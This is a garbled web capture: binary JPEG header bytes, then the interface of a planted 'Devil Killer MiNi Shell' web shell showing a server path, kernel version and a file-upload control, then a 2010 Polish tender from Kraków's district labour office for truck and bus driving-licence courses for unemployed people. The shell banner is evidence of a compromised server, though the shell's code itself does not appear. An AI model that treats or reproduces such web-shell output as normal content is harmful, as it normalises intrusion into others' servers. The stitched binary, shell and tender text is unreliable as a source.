JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/142452-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 193 000 euro 
na organizację i przeprowadzenie usługi szkoleniowej w zakresie  
prawa jazdy kategorii C, prawa jazdy kategorii C + E oraz prawa jazdy kategorii D
znak sprawy: ZP- 271/21/2010</b><br>
<b>Numer ogłoszenia: 142452 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 193 000 euro 
na organizację i przeprowadzenie usługi szkoleniowej w zakresie  
prawa jazdy kategorii C, prawa jazdy kategorii C + E oraz prawa jazdy kategorii D
znak sprawy: ZP- 271/21/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwy i kody przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień:
usługi szkoleniowe					- 80500000 - 9

Szczegółowy opis przedmiotu zamówienia.
1.Przedmiotem zamówienia jest organizacja i przeprowadzenie trzech kursów z zakresu prawa jazdy, z czego jeden dotyczy kategorii C, drugi kategorii C + E oraz trzeci kategorii D dla osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego.
2.Zamawiający nie dopuszcza składania ofert częściowych.
3.W ramach realizacji przedmiotu zamówienia Wykonawca zorganizuje i przeprowadzi poniższe kursy prawa jazdy:
A.w zakresie kategorii C Wykonawca przeszkoli 50 osób w następujących grupach:
a.I grupa - 10 osobowa 
b.II grupa - 20 osobowa
c.III grupa - 10 osobowa
d.IV grupa - 10 osobowa
Każda z czterech grup w ramach kategorii C, rozpocznie zajęcia w innym miesiącu, np. jeżeli grupa I rozpocznie zajęcia w lipcu, to grupa II  w sierpniu, a grupa  III we wrześniu, itp.

B.w zakresie kategorii C + E Wykonawca przeszkoli 25 osób w następujących grupach:
a.I grupa - 9 osób
b.II grupa - 8 osób
c.III grupa - 8 osób
Każda z trzech grup w ramach kategorii C+E, rozpocznie zajęcia w innym miesiącu, np. jeżeli grupa I rozpocznie zajęcia w lipcu, to grupa II  w sierpniu, itp.

C.w zakresie kategorii D Wykonawca przeszkoli 20 osób w następujących grupach:
a.I grupa - 10 osób
b.II grupa - 10 osób.
Każda z dwóch grup w ramach kategorii D, rozpocznie zajęcia w innym miesiącu, np. jeżeli grupa I rozpocznie zajęcia w lipcu, to grupa II  w sierpniu.
4.Zajęcia muszą zostać zrealizowane najpóźniej do 30 listopada 2010 r. 
5.Wykonawca zobowiązany będzie do zorganizowania jednego egzaminu zewnętrznego, którego koszt zostanie wliczony w cenę szkolenia. W przypadku, gdy uczestnik zajęć nie zda egzaminu zewnętrznego zorganizowanego przez Wykonawcę - Zamawiający nie będzie ponosił kosztów jego poprawki.
6.Termin egzaminu zewnętrznego ustali Wykonawca.
7.Wymiar czasowy zajęć w ramach poszczególnych kursów przedstawia się następująco:
a.kurs na kat. C - 51 godzin, w tym 20 godzin zajęć teoretycznych , 30 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.
b.kurs na kat. C + E - 46 godzin, w tym 20 godzin zajęć teoretycznych, 25 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.
c.kurs na kat. D- 81 godzin, w tym 20 godzin zajęć teoretycznych, 60 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.

Zajęcia teoretyczne: 1 godzina = 45 minut
Zajęcia praktyczne: 1 godzina = 60 minut

8.Program szkolenia oraz plan nauczania opracowany przez Wykonawcę muszą być zgodne z przepisami rozporządzenia Ministra Infrastruktury  z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz.1834) a także z ustawą Prawo o ruchu drogowym. 
9.Dzienny wymiar zajęć dydaktycznych nie może przekroczyć 7 godzin zajęć teoretycznych. Zajęcia odbywać się będą od poniedziałku do piątku, w godzinach pomiędzy 8.00 a 18.00 z uwzględnieniem dwóch przerw kawowych dla uczestników realizujących zajęcia teoretyczne. Zamawiający, po wcześniejszych uzgodnieniach z Wykonawcą, przewiduje możliwość przesunięć w zakresie terminów wskazanych w harmonogramie załączonym do oferty dotyczących dat rozpoczęcia zajęć poszczególnych grup. 
10.Zajęcia praktyczne obejmują zajęcia na placu manewrowym i w ruchu drogowym, rozpoczynają się po przeprowadzeniu zajęć teoretycznych.
11.Przeprowadzenie zajęć, zarówno praktycznych jak i teoretycznych, winno być potwierdzone w karcie przeprowadzonych zajęć każdorazowo po ich zakończeniu przez osobę prowadzącą zajęcia i uczestnika zajęć.
12.Miejsce realizacji szkolenia winno znajdować się w mieście Krakowie, w miejscu dogodnym pod względem dojazdu dla osób dojeżdżających z terenu Powiatu Krakowskiego.
13.Wykonawca zobowiązany będzie do zapewnienia wszystkim uczestnikom materiałów dydaktycznych, jak również do przekazania jednego kompletu do Urzędu Pracy Powiatu Krakowskiego (jeżeli zachodzi taka konieczność, Wykonawca wlicza w cenę szkolenia koszt przeznaczonego dla UPPK zestawu materiałów dydaktycznych). Dodatkowo, Wykonawca wyposaży uczestników zajęć w niezbędne materiały piśmienne i biurowe, których odbiór uczestnicy potwierdzą podpisując stosowne oświadczenie.
14.Szkolenie winno zakończyć się oceną nabytych umiejętności w postaci egzaminu, wydaniem zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C, kat. C+E oraz kat. D a także certyfikatu opatrzonego logo Unii Europejskiej, EFS a także logo projektu 7 Życzeń.


15.Wzór zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C, kat. C+E i kat. D oraz wzór certyfikatu, potwierdzone za zgodność z oryginałem przez uprawnionego przedstawiciela Wykonawcy, winny zostać załączone do oferty. 
16.Program szkolenia musi zawierać informacje, o których mówi rozporządzenie Ministra Pracy i Polityki Społecznej z dn. 02  marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 476, poz. 315), a mianowicie:
a.Nazwę i zakres szkolenia
b.Czas trwania i sposób organizacji szkolenia
c.Wymagania wstępne dla uczestników szkolenia
d.Cele szkolenia
e.Plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,            
z uwzględnieniem części teoretycznej i praktycznej
f.Treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g.Wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
h.Sposób sprawdzenia efektów szkolenia.
17.Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
a.Dzienna lista obecności uczestników szkolenia;
b.Dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
c.Oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych;
d.Oświadczenia uczestników potwierdzających odbiór ciepłych posiłków;
e.Imienna lista, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
f.Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenie; 
g.Protokół z egzaminu. 
18.Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację przedmiotowego szkolenia, a w szczególności: programu szkolenia, harmonogramu, dokumentów związanych z kosztami kursu, kosztorys, listy obecności uczestników, do dnia 31 grudnia 2020 roku.
19.Na zakończenie kursu, w ramach wynagrodzenia należnego Wykonawcy  z tytułu realizacji szkolenia, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Na etapie sporządzania oferty i wyliczania całkowitego zwrotu kosztów przejazdu ujmowanych w preliminarzu należy przyjąć  założenie o pełnej, tj. 100 %, frekwencji uczestników, która - na etapie realizacji umowy - zweryfikowana będzie na podstawie listy obecności uczestników zajęć. Zamawiający pokryje Wykonawcy nakłady poniesione z tytułu zwrotu kosztów przejazdu uczestników zajęć na podstawie list obecności. Kwotę zwrotu kosztów przejazdu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
20.Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu do następstw nieszczęśliwych wypadków z wyłączeniem osób posiadających prawo do stypendium szkoleniowego. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Przy ustalaniu całkowitego kosztu ubezpieczenia NW należy wstępnie założyć, że ubezpieczeniu podlegać będą wszyscy uczestnicy szkolenia. Tak ustalony koszt należy wyszczególnić w preliminarzu oraz uwzględnić go w całkowitym koszcie szkolenia ujmowanym w formularzu ofertowym. Jest to konieczne z uwagi na fakt, że w dniu ogłaszania postępowania Zamawiający nie dysponuje wiedzą ile osób uczestniczących w szkoleniu będzie podlegało ubezpieczeniu NW (1) i w związku z powyższym - koniecznością stworzenia warunków, w których oferty będą porównywalne.  Praktycznie jednak Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć. 
21.Wykonawca zobowiązany będzie do informowania społeczeństwa o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczanie w dokumentacji szkoleniowej informacji o udziale Unii Europejskiej a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.7.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006)  i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
22.Wykonawca, w trakcie realizacji zajęć teoretycznych, zapewni uczestnikom zajęć  dostęp do serwisu kawowego (tj. kawy, herbaty, wody mineralnej, drożdżówek lub ciasteczek). 
23.Wykonawca, pod  rygorem  utraty prawa do zapłaty za  szkolenie, zobowiązany będzie do niezwłocznego   poinformowania Zamawiającego  o:
a.Nie zgłoszeniu się uczestników na  szkolenie,
b.Przerwaniu szkolenia lub rezygnacji  z  uczestnictwa oraz każdorazowej nieobecności skierowanych  osób bezrobotnych,
c.Innych sytuacjach, które mają wpływ na realizację programu szkolenia i umowy.
24.Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 5 dni od dnia zakończenia szkolenia, następujących dokumentów:
a.Oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
b.Oryginału imiennego wykazu osób, które ukończyły szkolenie;
c.Oryginału imiennego wykazu osób, które nie ukończyły szkolenia; 
d.Kserokopii rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczony za zgodność z oryginałem;
e.Kserokopii dziennika zajęć poświadczona za zgodność z oryginałem;
f.Kserokopii  list obecności poświadczona za zgodność z oryginałem;
g.Kserokopii protokołu z egzaminu;
h.Oryginału kosztorysu powykonawczego;
i.Kserokopii wszystkich zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia, poświadczone za zgodność z oryginałem;
j.Oryginału oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych, ciepłych posiłków;
k.Oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
l.Inną dokumentację niezbędną do rozliczenia kursu.
25.Wykonawca zapewni uczestnikom szkolenia warunki do nauki w oparciu o wymogi wynikające z rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217, poz. 1834) oraz zasady BHP. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych.
26.Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 12 do SIWZ, jak również do przedstawienia jej wyników Zamawiającemu. 
27.Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek opisany w punkcie 1a) został spełniony w sytuacji, gdy Wykonawca potwierdzi uzyskanie wpisu do rejestrów instytucji szkoleniowych prowadzonego przez WUP składając wraz z ofertą stosowne oświadczenie, którego wzór stanowi załącznik nr 4 do SIWZ.
Zamawiający uzna, że warunek opisany w punkcie 1b) został spełniony w sytuacji, gdy Wykonawca potwierdzi uzyskanie wpisu do rejestrów przedsiębiorców prowadzących ośrodek szkolenia kierowców składając wraz z ofertą stosowne oświadczenie, którego wzór stanowi załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie 2a) został spełniony w sytuacji, gdy wykonawca wykaże w Wykazie wykonanych usług, który stanowi załącznik nr 6 do SIWZ, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował trzy szkolenia, z których jedno dotyczyło kategorii C, drugie dotyczyło kategorii C+E oraz trzecie dotyczyło kategorii D.
Zamawiający uzna, że warunek określony w punkcie 2b) został spełniony, w sytuacji gdy wykonawca wykaże w Wykazie wykonanych usług stanowiącym załącznik nr 6 do SIWZ, w kolumnie pn. Przedmiot usługi, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeszkolił w zakresie prawa jazdy kategorii C co najmniej 50 kursantów.
Zamawiający uzna, że warunek określony w punkcie 2c) został spełniony, w sytuacji gdy wykonawca wykaże w Wykazie wykonanych usług stanowiącym załącznik nr 6 do SIWZ, w kolumnie pn. Przedmiot usługi, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeszkolił w zakresie prawa jazdy kategorii C+E co najmniej 25 kursantów.
Zamawiający uzna, że warunek określony w punkcie 2d) został spełniony w sytuacji, gdy wykonawca wykaże w Wykazie wykonanych usług stanowiącym załącznik nr 6 do SIWZ, w kolumnie pn. Przedmiot usługi, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeszkolił w zakresie prawa jazdy kategorii D co najmniej 20 kursantów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek opisany w punkcie 3b) został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie narzędzi i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia stanowiącym załącznik nr 7 do SIWZ, iż dysponuje lub będzie dysponował samochodem/samochodami ciężarowymi o dopuszczalnej masie całkowitej wynoszącej co najmniej 10 ton i długości co najmniej 7 metrów;
Zamawiający uzna, że warunek opisany w punkcie 3c) został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie narzędzi i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia stanowiącym załącznik nr 7 do SIWZ, iż dysponuje lub będzie dysponował autobusem/autobusami przeznaczonym konstrukcyjnie do przewozu więcej niż 17 osób łącznie z kierowcą, o długości nie mniejszej niż 9 metrów;
Zamawiający uzna, że warunek opisany w punkcie 3d) został spełniony w sytuacji, gdy Wykonawca wykaże w Wykazie narzędzi i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia stanowiącym załącznik nr 7 do SIWZ, iż dysponuje lub będzie dysponował zespołem/zespołami pojazdów o dopuszczalnej masie całkowitej wynoszącej co najmniej 18 ton i długości co najmniej 12 metrów złożonym z samochodu ciężarowego określonego w podpunkcie b oraz przyczepy lub ciągnika siodłowego i naczepy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek opisany w punkcie 3a) został spełniony w sytuacji, gdy Wykonawca (1) wykaże w Wykazie osób, które będą uczestniczyć w wykonaniu zamówienia stanowiącym załącznik nr 8 do SIWZ , że dysponuje lub będzie dysponował osobami, które spełniają wymogi określone w art. 105 ust. 2 ustawy Prawo o ruchu drogowym i które uzyskały wpis do rejestru instruktorów prowadzonego przez  właściwego Starostę a także (2) złoży wraz z ofertą oświadczenie stanowiące załącznik nr 13 do SIWZ, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, tj. spełniają wymogi określone w art. 105 ust. 2 ustawy Prawo o ruchu drogowym oraz uzyskały wpis do rejestru instruktorów prowadzonego przez  właściwego Starostę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - załącznik nr 1 do SIWZ;
2.Oświadczenie o podleganiu wpisowi do rejestru instytucji szkoleniowych prowadzonych przez właściwy WUP - załącznik nr 4 do SIWZ.
3.Oświadczenie o podleganiu wpisowi do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców - załącznik nr 5 do SIWZ.
4.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 5.Wykonawca wskazał osoby, którymi będzie dysponował. Dotyczy sytuacji, w której Wykonawca będzie polegać na osobach zdolnych do wykonania zamówienia innych podmiotów. 
6.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy zasobów, jeżeli w wykazie, o którym mowa w punkcie 10, Wykonawca wskazał zasoby, którymi będzie dysponował. Dotyczy sytuacji, w której Wykonawca będzie polegać na zasobach innych podmiotów. 
7.Szczegółowy program szkolenia opracowany zgodnie z wytycznymi zawartymi w punktach    I. 8), I. 9) oraz I. 16) SIWZ;
8.Harmonogram zajęć rozpisany na poszczególne grupy, dni i godziny trwania szkolenia z podaniem tematyki  i rodzaju zajęć, czasu ich trwania oraz nazwiska osoby prowadzącej. 
